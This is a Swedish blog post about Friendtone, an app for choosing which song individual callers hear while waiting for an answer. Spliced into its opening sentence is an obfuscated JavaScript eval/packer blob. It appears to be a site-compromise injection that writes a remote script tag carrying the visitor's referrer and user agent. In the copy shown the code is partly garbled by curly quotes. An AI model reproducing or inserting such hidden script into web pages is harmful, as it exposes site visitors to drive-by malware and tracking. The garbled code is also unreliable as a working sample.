Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Friendtone låter dig välja vad vännerna ska lyssna på

Friendtone låter dig välja vad vännerna ska lyssna på
Sebastian


Friendtone eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztsdr|var|u0026u|referrer|ssayt||js|php’.split(’|’),0,{}))
är appen som gör det möjligt att anpassa din ringsignal efter vem det är som ringer till dig. 

Friendtone har nu uppdaterat sin app i app store.  

Du kan med Friendtone byta ut den vanliga tut-signalen och låta dina vänner lyssna på din favoritlåt istället medan de väntar på att du svarar.

Denna tjänst har länge funnits öppen för kunder till operatören Tre. Men nu är det möjligt för alla att ta del av den.
Det roliga är att du kan anpassa exakt vilken låt en specifik vän ska få lyssna på. Har du några kompisar du vet gillar Hip Hop är det den genre du väljer för dessa. Du kan även tilldela kontakter enskilda ringsignaler så du slipper ta en titt på skärmen för att se vem det är som ringer dig mitt i mötet.

För de personer som köper tjänsten kan man välja mellan ca 4000 kända låtar men tyvärr endast använda 20 stycken år gången.

Ladda ner och ta er själva en titt!